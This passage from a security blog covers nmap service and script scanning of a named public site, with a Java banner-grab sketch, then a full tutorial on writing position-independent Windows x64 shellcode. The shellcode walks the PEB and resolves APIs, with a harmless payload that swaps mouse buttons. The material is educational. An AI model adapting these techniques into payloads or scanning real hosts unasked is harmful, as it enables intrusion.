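            OutputStream out = socket.getOutputStream();
            out.write("GET / HTTP/1.0\r\n\r\n".getBytes(StandardCharsets.US_ASCII));
            out.flush();

            BufferedReader reader = new BufferedReader(
                new InputStreamReader(socket.getInputStream(), StandardCharsets.ISO_8859_1));

            // Read the status line and headers until the empty line
            String line;
            while ((line = reader.readLine()) != null && !line.isEmpty())
            {
                if (line.regionMatches(true, 0, "Server:", 0, 7))
                    return line.substring(7).trim();
            }

            return null;
        }
        catch (IOException e)
        {
            return null;
        }
    }

    // Starts a throwaway local server and probes it
    static String demo()
    {
        try (ServerSocket listener = new ServerSocket(0))
        {
            Thread server = new Thread(() -> answerOnce(listener));
            server.start();

            String banner = serverHeader("127.0.0.1", listener.getLocalPort(), 2000);
            server.join(3000);

            return banner;
        }
        catch (IOException | InterruptedException e)
        {
            return null;
        }
    }

    // Accepts one connection, reads the request headers and sends a fixed reply
    private static void answerOnce(ServerSocket listener)
    {
        try (Socket client = listener.accept())
        {
            BufferedReader reader = new BufferedReader(
                new InputStreamReader(client.getInputStream(), StandardCharsets.ISO_8859_1));

            String line;
            while ((line = reader.readLine()) != null && !line.isEmpty()) { }

            OutputStream out = client.getOutputStream();
            out.write("HTTP/1.0 200 OK\r\nServer: DemoServer\r\n\r\n".getBytes(StandardCharsets.US_ASCII));
            out.flush();
        }
        catch (IOException e)
        {
            // Ignored in this sketch
        }
    }

    public static void main(String[] args)
    {
        System.out.println(demo());
    }
}
```

Real servers can hide or fake this header, which is one reason why nmap sends several different requests instead of relying on a single one.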

Script scan

If we enable the script scan (-sC), the number of requests increases as it will use multiple “scripts” to find more information about the target. Let’s take the following example:

# nmap -sS -Pn -p 80 -sC 137.74.202.89
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-17 14:14 EDT
Nmap scan report for rstforums.com (137.74.202.89)
Host is up (0.045s latency).
PORT   STATE SERVICE
80/tcp open  http
|_http-title: Did not follow redirect to https://rstforums.com/
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds

Below is the Wireshark output, using a filter that matches only the HTTP requests sent:

As you can see, nmap scripts will send several HTTP requests useful to find more information about the application running on the web server. For example, it will send a request to find out if a “.git” directory is present, which can contain source code, it sends a request to get the “robots.txt” file, which might lead to additional paths, and one script even sends a POST request to find out if there is an RPC (Remote Procedure Call) aware service running:

POST / HTTP/1.1
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Host: rstforums.com

<methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>

Conclusion

Nmap is most often seen as a “port scanner”. However, in the right hands, in the hands of someone that properly understands how it works, it turns into a powerful penetration testing tool.

This article highlights some of the most common and useful features of nmap, but for a comprehensive understanding of the tool it is required to read the manual and actually use it.

Writing shellcodes for Windows x64

Nytro Security

By: nytrosecurity

30 June 2019 at 16:01

A long time ago I wrote three detailed blog posts about how to write shellcodes for Windows (x86 – 32 bits). The articles are beginner friendly and contain a lot of details. The first part explains what a shellcode is and what its limitations are, the second part explains the PEB (Process Environment Block), the PE (Portable Executable) file format and the basics of ASM (Assembler), and the third part shows how a Windows shellcode can actually be implemented.

This blog post is a port of the previous articles to Windows 64 bits (x64) and it will not cover all the details explained in the previous blog posts, so anyone who is not familiar with the concepts of shellcode development on Windows should read them before going further.

Of course, the differences between x86 and x64 shellcode development on Windows, including ASM, will be covered here. However, since I already wrote some details about Windows 64 bits in the Stack Based Buffer Overflows on x64 (Windows) blog post, I will just copy and paste them here.

As in the previous blog posts, we will create a simple shellcode that swaps the mouse buttons using the SwapMouseButton function exported by user32.dll and gracefully closes the process using the ExitProcess function exported by kernel32.dll.

ASM for x64

There are multiple differences in Assembly that need to be understood in order to proceed. Here we will talk about the most important changes between x86 and x64 related to what we are going to do.

Please note that this article is for educational purposes only. It has to be simple, which means there are a lot of optimizations that could make the resulting shellcode smaller and faster.

First of all, the registers are now the following:

The general purpose registers are the following: RAX, RBX, RCX, RDX, RSI, RDI, RBP and RSP. They are now 64 bits (8 bytes) instead of 32 bits (4 bytes).
EAX, EBX, ECX, EDX, ESI, EDI, EBP and ESP represent the lower 4 bytes (the least significant 32 bits) of the previously mentioned registers.
There are a few new registers: R8, R9, R10, R11, R12, R13, R14 and R15, also holding 64 bits.
It is possible to use R8D, R9D etc. in order to access their lower 4 bytes, as you can do with EAX, EBX etc.
Pushing and popping data on the stack uses 64 bits instead of 32 bits.
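
To make the relationship between the 64-bit registers and their 32-bit names concrete, here is a small Python model. It is only a sketch: the function names are made up for illustration and nothing here touches real registers. It relies on one architectural rule worth remembering: on x64, writing to a 32-bit register such as EAX clears the upper 32 bits of the corresponding 64-bit register.

```python
MASK32 = 0xFFFFFFFF

def read_low32(reg64):
    """Value seen through the 32-bit name (EAX, R8D, ...)."""
    return reg64 & MASK32

def write_low32(reg64, value):
    """Model of `mov eax, value`: the old upper 32 bits are discarded."""
    return value & MASK32

rax = 0x1122334455667788
print(hex(read_low32(rax)))   # 0x55667788
rax = write_low32(rax, 4)
print(hex(rax))               # 0x4
```

This is why a small constant can be loaded through the 32-bit name and still leave a clean 64-bit value in the full register.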

Calling convention

Another important difference is the way functions are called, the calling convention.

Here are the most important things we need to know:

The first 4 parameters are not placed on the stack. They are passed in the RCX, RDX, R8 and R9 registers.
If there are more than 4 parameters, the remaining ones are placed on the stack in order: the fifth parameter sits just above the shadow space, the sixth one 8 bytes higher, and so on.
Similar to x86, the return value will be available in the RAX register.
The function caller allocates stack space for the arguments passed in registers (called “shadow space” or “home space”). Even though the parameters are passed in registers, the called function may need to reuse those registers, so it needs somewhere to save their values, and that place is the stack. The caller has to allocate this space before the function call and deallocate it afterwards. It should allocate at least 32 bytes (for the 4 registers), even if not all of them are used.
The stack has to be 16-byte aligned before any call instruction. This is why functions often allocate 40 (0x28) bytes on the stack: 32 bytes for the 4 registers and 8 bytes to restore the alignment broken by the return address (RIP) that the call instruction pushed. You can find more details here.
Some registers are volatile and others are nonvolatile. This means that if we set some values in registers and call a function (e.g. a Windows API), the volatile registers will probably change while the nonvolatile registers will preserve their values.
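
The rules above can be sketched as a small Python helper that tells where each argument lives right before the call instruction. This is a simplified model that only covers integer and pointer arguments; the names `place_arguments`, `REGISTER_ARGS` and `SHADOW_SPACE` are mine and do not come from any real tool.

```python
REGISTER_ARGS = ["RCX", "RDX", "R8", "R9"]
SHADOW_SPACE = 0x20  # 32 bytes reserved by the caller

def place_arguments(count):
    """Return where each integer argument lives just before the CALL."""
    locations = []
    for index in range(count):
        if index < len(REGISTER_ARGS):
            locations.append(REGISTER_ARGS[index])
        else:
            # Stack arguments sit right above the shadow space, 8 bytes each.
            offset = SHADOW_SPACE + 8 * (index - len(REGISTER_ARGS))
            locations.append(f"[RSP+{offset:#x}]")
    return locations

print(place_arguments(6))
# ['RCX', 'RDX', 'R8', 'R9', '[RSP+0x20]', '[RSP+0x28]']
```

The functions called in this article take at most two arguments, so only RCX and RDX matter for the shellcode itself.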

More details about calling convention on Windows can be found here.

Function calling example

Let’s take a simple example in order to understand those things. Below is a function that does a simple addition, and it is called from main.

#include "stdafx.h"

int Add(long x, int y)
{
    int z = x + y;
    return z;
}

int main()
{
    Add(3, 4);
    return 0;
}

Here is a possible output, after disabling all optimizations and security features. Note that the disassembler prints numbers in hexadecimal, so 28 means 0x28.

Main function:

sub rsp,28
mov edx,4
mov ecx,3
call <consolex64.Add>
xor eax,eax
add rsp,28
ret

We can see the following:

sub rsp,28 – This will allocate 0x28 (40) bytes on the stack, as we discussed: 32 bytes for the register arguments and 8 bytes for alignment.
mov edx,4 – This will place the second parameter in the EDX register. Since the number is small, there is no need to use RDX, the result is the same.
mov ecx,3 – The value of the first argument is placed in the ECX register.
call <consolex64.Add> – Call the “Add” function.
xor eax,eax – Set EAX (or RAX) to 0, as it will be the return value of main.
add rsp,28 – Releases the allocated stack space.
ret – Return from main.

Add function:

mov dword ptr ss:[rsp+10],edx
mov dword ptr ss:[rsp+8],ecx
sub rsp,18
mov eax,dword ptr ss:[rsp+28]
mov ecx,dword ptr ss:[rsp+20]
add ecx,eax
mov eax,ecx
mov dword ptr ss:[rsp],eax
mov eax,dword ptr ss:[rsp]
add rsp,18
ret

Let’s see how this function works:

mov dword ptr ss:[rsp+10],edx – As we know, the arguments are passed in the ECX and EDX registers. But what if the function needs to use those registers for something else? In this case, it can save them in the “shadow space” (“home space”) allocated by the caller. With this instruction, the function saves the second argument (the value 4) from the EDX register into the shadow space. Please also note that some registers must be preserved across a function call: RBX, RBP, RDI, RSI, R12, R13, R14 and R15.
mov dword ptr ss:[rsp+8],ecx – Similar to the previous instruction, this one will save on the stack the first argument (value 3) from the ECX register.
sub rsp,18 – Allocates 0x18 (24) bytes on the stack. This function does not call other functions, so it does not need to allocate 32 bytes of shadow space, nor is it required to align the stack to 16 bytes. I am not sure why it allocates 24 bytes; it looks like the “local variables area” on the stack has to be aligned to 16 bytes and the other 8 bytes might be used for the stack alignment (as previously mentioned).
mov eax,dword ptr ss:[rsp+28] – Will place in the EAX register the value of the second parameter (value 4).
mov ecx,dword ptr ss:[rsp+20] – Will place in the ECX register the value of the first parameter (value 3).
add ecx,eax – Will add to ECX the value of the EAX register, so ECX will become 7.
mov eax,ecx – Will copy the same value (the sum) into the EAX register.
mov dword ptr ss:[rsp],eax and mov eax,dword ptr ss:[rsp] – These store the result in the local variable z and load it back; they look like a side effect of the disabled optimizations and do nothing useful.
add rsp,18 – Cleans up the allocated stack space.
ret – Return from the function.
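
The offsets in the listing can look arbitrary, so here is the arithmetic behind them as a short Python sketch. The helper name `home_slot_offset` is hypothetical; the constants come from the disassembly above (an 8-byte return address pushed by call, and the 0x18 bytes reserved by sub rsp,18).

```python
RETURN_ADDRESS = 8   # pushed by CALL
LOCALS = 0x18        # `sub rsp,18` in the Add prologue

def home_slot_offset(arg_index, after_prologue):
    """Offset from RSP of the home slot for argument `arg_index` (0-based)."""
    offset = RETURN_ADDRESS + 8 * arg_index
    if after_prologue:
        offset += LOCALS
    return offset

print(hex(home_slot_offset(0, False)), hex(home_slot_offset(1, False)))  # 0x8 0x10
print(hex(home_slot_offset(0, True)), hex(home_slot_offset(1, True)))    # 0x20 0x28
```

So [rsp+8] and [rsp+20] are the same memory location: the first is seen before the function reserves its locals, the second after.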

Writing ASM on Windows x64

There are multiple ways to write assembler on Windows x64. I will use NASM and the linker provided by Microsoft Visual Studio Community.

I will use the x64.asm file to write the assembler code, the NASM will output x64.obj and the linker will create x64.exe. To keep this process simple, I created a simple Windows Batch script:

del x64.obj
del x64.exe
nasm -f win64 x64.asm -o x64.obj
link /ENTRY:main /MACHINE:X64 /NODEFAULTLIB /SUBSYSTEM:CONSOLE x64.obj

You can run it from the “x64 Native Tools Command Prompt for VS 2019”, where “link” is available directly. Just do not forget to add the directory with the NASM binaries to the PATH environment variable.

To test the shellcode, I open the resulting binary in x64dbg and go through the code step by step. This way, we can be sure everything is OK.

Before starting with the actual shellcode, we can start with the following:

BITS 64
SECTION .text
global main
main:

sub   RSP, 0x28                 ; 40 bytes of shadow space
and   RSP, 0FFFFFFFFFFFFFFF0h   ; Align the stack to a multiple of 16 bytes

This declares 64-bit code with a “main” function in the “.text” (code) section. The code also allocates some stack space and aligns the stack to a multiple of 16 bytes.

Find kernel32.dll base address

As we know, the first step in the shellcode development process for Windows is to find the base address of kernel32.dll, the memory address where it is loaded. This will help us to find its useful exported functions: GetProcAddress and LoadLibraryA, which we can use to achieve our goals.

We will start by finding the TEB (Thread Environment Block), the structure that contains thread information in user mode. We can find it using the GS register, at gs:[0x00]. This structure also contains a pointer to the PEB (Process Environment Block) at offset 0x60.

The PEB contains a pointer to the “Loader” data (Ldr) at offset 0x18, which contains the “InMemoryOrder” list of modules at offset 0x20. As on x86, the first module is the executable, the second one is ntdll.dll and the third one is kernel32.dll, which is the one we want to find. This means we will go through a linked list (a LIST_ENTRY structure which contains two LIST_ENTRY* pointers, Flink and Blink, 8 bytes each on x64).

After we find the third module, kernel32.dll, we just need to read the value at offset 0x20 from its list entry to get its base address and we can start doing our stuff.

Below is how we can get the base address of kernel32.dll using PEB and store it in the RBX register:

; Parse PEB and find kernel32

xor rcx, rcx             ; RCX = 0
mov rax, [gs:rcx + 0x60] ; RAX = PEB
mov rax, [rax + 0x18]    ; RAX = PEB->Ldr
mov rsi, [rax + 0x20]    ; RSI = PEB->Ldr.InMemOrder
lodsq                    ; RAX = Second module
xchg rax, rsi            ; RAX = RSI, RSI = RAX
lodsq                    ; RAX = Third(kernel32)
mov rbx, [rax + 0x20]    ; RBX = Base address
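
The same walk can be modelled in Python to see which pointer is followed at each step. This is only a simulation: the addresses, module names and base addresses below are invented, and "memory" is a plain dictionary. The offsets are the ones described in the text.

```python
# Offsets taken from the text above (x64).
TEB_PEB = 0x60          # TEB -> PEB pointer
PEB_LDR = 0x18          # PEB -> Ldr pointer
LDR_IN_MEMORY = 0x20    # Ldr -> InMemoryOrder list head (Flink)
ENTRY_DLL_BASE = 0x20   # InMemoryOrder link -> module base address

def build_fake_process():
    """Lay out a made-up TEB/PEB/Ldr and three module entries in a dict."""
    teb, peb, ldr = 0x1000, 0x2000, 0x3000
    modules = [("app.exe", 0x4000, 0x140000000),
               ("ntdll.dll", 0x5000, 0x7FFA10000000),
               ("kernel32.dll", 0x6000, 0x7FFA0F000000)]
    memory = {teb + TEB_PEB: peb, peb + PEB_LDR: ldr}
    list_head = ldr + LDR_IN_MEMORY
    links = [link for _, link, _ in modules]
    memory[list_head] = links[0]
    for position, (_, link, base) in enumerate(modules):
        # Flink of the last entry points back to the list head.
        is_last = position + 1 == len(links)
        memory[link] = list_head if is_last else links[position + 1]
        memory[link + ENTRY_DLL_BASE] = base
    return memory, teb

def find_third_module_base(memory, teb):
    """Mirror the assembly: follow Flink twice from the first entry."""
    peb = memory[teb + TEB_PEB]
    ldr = memory[peb + PEB_LDR]
    entry = memory[ldr + LDR_IN_MEMORY]   # first module (the executable)
    entry = memory[entry]                 # second module
    entry = memory[entry]                 # third module
    return memory[entry + ENTRY_DLL_BASE]

memory, teb = build_fake_process()
print(hex(find_third_module_base(memory, teb)))  # 0x7ffa0f000000
```

Each `memory[entry]` read corresponds to one lodsq in the assembly, which loads the Flink pointer of the current entry.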

Find the address of GetProcAddress function

Finding the address of the GetProcAddress function is really similar to the x86 version; the only difference is the offset of the export table, which is 0x88 instead of 0x78.
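
For those wondering where the two numbers come from, here is the arithmetic as a short Python sketch. The constant names are mine; the sizes are the ones from the PE format, where the 64-bit optional header (PE32+) places its data directories 16 bytes later than the 32-bit one.

```python
PE_SIGNATURE = 4             # "PE\0\0"
COFF_HEADER = 20             # IMAGE_FILE_HEADER
# Offset of the data directories inside the optional header.
DATA_DIRS_PE32 = 0x60        # 32-bit optional header (PE32)
DATA_DIRS_PE32_PLUS = 0x70   # 64-bit optional header (PE32+)

def export_directory_offset(is_64bit):
    """Offset of the export directory entry from the PE signature."""
    data_dirs = DATA_DIRS_PE32_PLUS if is_64bit else DATA_DIRS_PE32
    # The export directory is the first data directory entry.
    return PE_SIGNATURE + COFF_HEADER + data_dirs

print(hex(export_directory_offset(False)), hex(export_directory_offset(True)))
# 0x78 0x88
```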

The steps are the same:

Go to the PE header (offset 0x3c)
Go to Export table (offset 0x88)
Go to the names table (offset 0x20)
Get the function name
Check if it starts with “GetProcA”
Go to the ordinals table (offset 0x24)
Get function number
Go to the address table (offset 0x1c)
Get the function address

Below is the code that can help us find the address of GetProcAddress:

; Parse kernel32 PE

xor r8, r8                 ; Clear r8
mov r8d, [rbx + 0x3c]      ; R8D = DOS->e_lfanew offset
mov rdx, r8                ; RDX = DOS->e_lfanew
add rdx, rbx               ; RDX = PE Header
mov r8d, [rdx + 0x88]      ; R8D = Offset export table
add r8, rbx                ; R8 = Export table
xor rsi, rsi               ; Clear RSI
mov esi, [r8 + 0x20]       ; RSI = Offset namestable
add rsi, rbx               ; RSI = Names table
xor rcx, rcx               ; RCX = 0
mov r9, 0x41636f7250746547 ; GetProcA

; Loop through exported functions and find GetProcAddress

Get_Function:

inc rcx                    ; Increment the name index
xor rax, rax               ; RAX = 0
mov eax, [rsi + rcx * 4]   ; Get name offset
add rax, rbx               ; Get function name
cmp QWORD [rax], r9        ; GetProcA ?
jnz Get_Function
xor rsi, rsi               ; RSI = 0
mov esi, [r8 + 0x24]       ; ESI = Offset ordinals
add rsi, rbx               ; RSI = Ordinals table
mov cx, [rsi + rcx * 2]    ; Number of function
xor rsi, rsi               ; RSI = 0
mov esi, [r8 + 0x1c]       ; Offset address table
add rsi, rbx               ; RSI = Address table
xor rdx, rdx               ; RDX = 0
mov edx, [rsi + rcx * 4]   ; EDX = Pointer(offset)
add rdx, rbx               ; RDX = GetProcAddress
mov rdi, rdx               ; Save GetProcAddress in RDI

Please note that this has to be done carefully. Some fields in the PE file are smaller than 8 bytes (the offsets are 4 bytes and the ordinals are 2 bytes), while in the end we need 8-byte pointers. This is why the code above uses registers such as ESI or CX.
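
To see the three tables working together, here is a Python sketch that does the same lookup on a tiny fake image. Everything in it is an assumption made for illustration: the image is built by hand, the function names and offsets inside it are invented, and unlike the assembly it compares the full name instead of only the first 8 bytes. The field offsets inside the export directory (0x18, 0x1c, 0x20, 0x24) are the real ones.

```python
import struct

def u32(image, rva):
    return struct.unpack_from("<I", image, rva)[0]

def u16(image, rva):
    return struct.unpack_from("<H", image, rva)[0]

def cstring(image, rva):
    return image[rva:image.index(b"\0", rva)].decode("ascii")

def resolve_export(image, export_dir, wanted):
    """Return the RVA of `wanted` by walking names -> ordinals -> addresses."""
    count = u32(image, export_dir + 0x18)      # NumberOfNames
    functions = u32(image, export_dir + 0x1C)  # AddressOfFunctions
    names = u32(image, export_dir + 0x20)      # AddressOfNames
    ordinals = u32(image, export_dir + 0x24)   # AddressOfNameOrdinals
    for index in range(count):
        if cstring(image, u32(image, names + 4 * index)) == wanted:
            slot = u16(image, ordinals + 2 * index)   # 2-byte entries
            return u32(image, functions + 4 * slot)   # 4-byte RVAs
    return None

def build_fake_image():
    """Hand-made image with two exports; not a valid PE file."""
    image = bytearray(0x200)
    export_dir, functions, names, ordinals = 0x40, 0x80, 0xA0, 0xC0
    exported = [("Beep", 0x1111), ("GetProcAddress", 0x2222)]
    struct.pack_into("<IIII", image, export_dir + 0x18,
                     len(exported), functions, names, ordinals)
    string_rva = 0x100
    for index, (name, function_rva) in enumerate(exported):
        # Slots deliberately differ from the name index.
        slot = len(exported) - 1 - index
        struct.pack_into("<I", image, names + 4 * index, string_rva)
        struct.pack_into("<H", image, ordinals + 2 * index, slot)
        struct.pack_into("<I", image, functions + 4 * slot, function_rva)
        image[string_rva:string_rva + len(name)] = name.encode("ascii")
        string_rva += len(name) + 1
    return bytes(image), export_dir

image, export_dir = build_fake_image()
print(hex(resolve_export(image, export_dir, "GetProcAddress")))  # 0x2222
```

The value returned is still an offset, which is why the assembly finishes with add rdx, rbx to turn it into a real address.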

Find the address of LoadLibraryA

Since we have the address of GetProcAddress and the base address of kernel32.dll, we can use them to call GetProcAddress(kernel32.dll, “LoadLibraryA”) and find the address of LoadLibraryA function.

However, there is something important we need to be careful about: we will use the stack to place our strings (e.g. “LoadLibraryA”) and this might break the stack alignment, so we need to make sure it is 16-byte aligned. Also, we must not forget about the stack space that we need to allocate for a function call, because the function we call might use it. So, we need to place our string on the stack and only after this allocate space for the function we call (e.g. GetProcAddress).

Finding the address of LoadLibraryA is pretty straightforward:

; Use GetProcAddress to find the address of LoadLibrary

mov rcx, 0x41797261          ; aryA
push rcx                     ; Push on the stack
mov rcx, 0x7262694c64616f4c  ; LoadLibr
push rcx                     ; Push on stack
mov rdx, rsp                 ; LoadLibraryA
mov rcx, rbx                 ; kernel32.dll base address
sub rsp, 0x30                ; Allocate stack space for function call
call rdi                     ; Call GetProcAddress
add rsp, 0x30                ; Cleanup allocated stack space
add rsp, 0x10                ; Clean space for LoadLibrary string
mov rsi, rax                 ; LoadLibrary saved in RSI

We put the “LoadLibraryA” string on the stack, setup RCX and RDX registers, allocate space on the stack for the function call, call GetProcAddress and cleanup the stack. As a result, we will store the LoadLibraryA address in the RSI register.
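
Computing the constants by hand is error-prone, so a few lines of Python can generate them. This is a helper sketch of my own (the name `push_constants` is hypothetical), assuming ASCII strings. It splits the string into 8-byte chunks, reads each chunk as a little-endian number and returns them in push order, last chunk first, because the stack grows downwards.

```python
def push_constants(text):
    """Split `text` into 8-byte little-endian values, last chunk first."""
    data = text.encode("ascii")
    chunks = [data[i:i + 8] for i in range(0, len(data), 8)]
    if not chunks or len(chunks[-1]) == 8:
        # No room left for the terminator: push an extra zero qword first.
        chunks.append(b"")
    # A short final chunk is zero-padded, which gives the NULL terminator.
    return [int.from_bytes(chunk, "little") for chunk in reversed(chunks)]

for value in push_constants("LoadLibraryA"):
    print(f"mov rcx, {value:#x}")
    print("push rcx")
# mov rcx, 0x41797261
# push rcx
# mov rcx, 0x7262694c64616f4c
# push rcx
```

The output matches the constants used in the listing above, and the same helper works for the other strings in this article.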

Load user32.dll using LoadLibraryA

Since we have the address of LoadLibraryA function, it is pretty simple to call LoadLibraryA(“user32.dll”) to load user32.dll and find out its base address which will be returned by LoadLibraryA.

mov rcx, 0x6c6c               ; ll
push rcx                      ; Push on the stack
mov rcx, 0x642e323372657375   ; user32.d
push rcx                      ; Push on stack
mov rcx, rsp                  ; user32.dll
sub rsp, 0x30                 ; Allocate stack space for function call
call rsi                      ; Call LoadLibraryA
add rsp, 0x30                 ; Cleanup allocated stack space
add rsp, 0x10                 ; Clean space for user32.dll string
mov r15, rax                  ; Base address of user32.dll in R15

The function will return the base address of the user32.dll module into RAX and we will save it in the R15 register.

Find the address of SwapMouseButton function

We have the address of GetProcAddress, the base address of user32.dll and we know the function is called “SwapMouseButton”. So we just need to call GetProcAddress(user32.dll, “SwapMouseButton”).

Please note that when we allocate space on the stack for this function call, we no longer allocate 0x30 (48) bytes, only 0x28 (40) bytes. This is because placing our string (“SwapMouseButton”) on the stack takes 3 PUSH instructions, so we get 0x18 (24) bytes of data, which is not a multiple of 16. So we use 0x28 instead of 0x30 to keep the stack aligned to 16 bytes (0x18 + 0x28 = 0x40).
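
This check is easy to get wrong, so here it is as a tiny Python sketch. The function name is made up, and it assumes RSP was 16-byte aligned before the string was pushed, which is the case after the alignment done at the start of main.

```python
SHADOW_SPACE = 0x20  # minimum the caller must reserve

def stack_ok_for_call(pushed_qwords, allocation):
    """True if RSP is 16-byte aligned and the shadow space fits."""
    moved = 8 * pushed_qwords + allocation
    return allocation >= SHADOW_SPACE and moved % 16 == 0

print(stack_ok_for_call(2, 0x30))  # True
print(stack_ok_for_call(3, 0x30))  # False
print(stack_ok_for_call(3, 0x28))  # True
```

The rule of thumb is simple: an even number of pushes needs an allocation that is a multiple of 16, an odd number needs one that ends in 8.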

; Call GetProcAddress(user32.dll, "SwapMouseButton")

xor rcx, rcx                  ; RCX = 0
push rcx                      ; Push 0 on stack
mov rcx, 0x6e6f7474754265     ; eButton
push rcx                      ; Push on the stack
mov rcx, 0x73756f4d70617753   ; SwapMous
push rcx                      ; Push on stack
mov rdx, rsp                  ; SwapMouseButton
mov rcx, r15                  ; User32.dll base address
sub rsp, 0x28                 ; Allocate stack space for function call
call rdi                      ; Call GetProcAddress
add rsp, 0x28                 ; Cleanup allocated stack space
add rsp, 0x18                 ; Clean space for SwapMouseButton string
mov r15, rax                  ; SwapMouseButton in R15

GetProcAddress will return in RAX the address of SwapMouseButton function and we will save it into R15 register.

Call SwapMouseButton

Well, we have its address, so it should be pretty easy to call it. We do not have any issue here: we previously cleaned up the stack, so it is still aligned, and we do not need to alter it for this function call. So we just set the RCX register to 1 (meaning true) and call it.

; Call SwapMouseButton(true)

mov rcx, 1    ; true
call r15      ; SwapMouseButton(true)

Find the address of ExitProcess function

As we already did before, we use GetProcAddress to find the address of ExitProcess function exported by the kernel32.dll. We still have the kernel32.dll base address in RBX (which is a nonvolatile register and this is why it is used) so it is simple:

; Call GetProcAddress(kernel32.dll, "ExitProcess")

xor rcx, rcx                 ; RCX = 0
mov rcx, 0x737365            ; ess
push rcx                     ; Push on the stack
mov rcx, 0x636f725074697845  ; ExitProc
push rcx                     ; Push on stack
mov rdx, rsp                 ; ExitProcess
mov rcx, rbx                 ; Kernel32.dll base address
sub rsp, 0x30                ; Allocate stack space for function call
call rdi                     ; Call GetProcAddress
add rsp, 0x30                ; Cleanup allocated stack space
add rsp, 0x10                ; Clean space for ExitProcess string
mov r15, rax                 ; ExitProcess in R15

We save the address of ExitProcess function in R15 register.

ExitProcess

Since we do not want the process to crash, we can “gracefully” exit by calling the ExitProcess function. We have the address, the stack is aligned, so we just have to call it.

; Call ExitProcess(0)

mov rcx, 0     ; Exit code 0
call r15       ; ExitProcess(0)

Conclusion

There are many articles about Windows shellcode development on x64, such as this one or this one, but I just wanted to tell the story my way, following the previously written articles.

The shellcode is far from being optimized and it also contains NULL bytes. However, both of these limitations can be addressed.
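
As a starting point for the NULL bytes, a few lines of Python can show where they are in an assembled blob. This is only a sketch: the helper name is mine, and the two byte sequences are my own illustration of the idea (loading 1 into ECX in two different ways), not bytes taken from the shellcode above.

```python
def null_offsets(code):
    """Offsets of every 0x00 byte in an assembled blob."""
    return [offset for offset, byte in enumerate(code) if byte == 0]

# mov ecx, 1  ->  B9 01 00 00 00 (immediate padded with zero bytes)
with_nulls = bytes.fromhex("b901000000")
# xor ecx, ecx / inc ecx  ->  31 C9 FF C1 (same result, no zero bytes)
without_nulls = bytes.fromhex("31c9ffc1")

print(null_offsets(with_nulls))     # [2, 3, 4]
print(null_offsets(without_nulls))  # []
```

Small immediates and short strings are the usual source of zero bytes, so those are the first instructions to look at.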

Shellcode development is fun and switching from x86 to x64 is needed, because x86 will be used less and less in the future.

Of course, I will add support for Windows x64 in Shellcode Compiler.

If you have any questions, please add a comment or contact me.